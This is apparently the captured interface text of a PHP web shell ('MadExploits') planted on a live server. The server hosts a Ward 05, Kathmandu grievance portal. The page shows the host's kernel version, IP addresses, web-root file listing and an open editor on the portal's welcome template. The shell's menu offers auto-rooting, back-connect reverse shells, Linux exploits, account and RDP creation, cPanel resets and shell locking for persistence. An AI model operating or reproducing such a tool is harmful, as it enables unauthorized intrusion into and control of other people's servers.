Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxrwxr-x
auth
[ DIR ]
drwxrwxr-x
exports
[ DIR ]
drwxrwxr-x
helpers
[ DIR ]
drwxrwxr-x
layout
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
login.blade.php
2.19
KB
-rw-rw-r--
welcome.blade.php
1.03
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : welcome.blade.php
@extends('layout.public') @section('title') Home @endsection @section('content') <article> <div class="container"> <div class="row"> <div class="col-lg-6 col-xl-5"> <div class="text-container"> <div class="text-primary">Welcome to Grievance Management Portal</div> <h1 class="h1-large">Portal run by Ward 05, Kathmandu Metropolitan City</h1> <p class="p-large">We are committed to resolve issues raised by residents of Ward 05 as soon as possible.</p> <a class="btn btn-primary" href="{{route('web.login')}}">Login to Your Account</a> </div> </div> <div class="col-lg-6 col-xl-7"> <div class="image-container"> <img class="img-fluid" src="{{ asset('front/images/grievance.png') }}" alt="" /> </div> </div> </div> </div> </header> @endsection
Close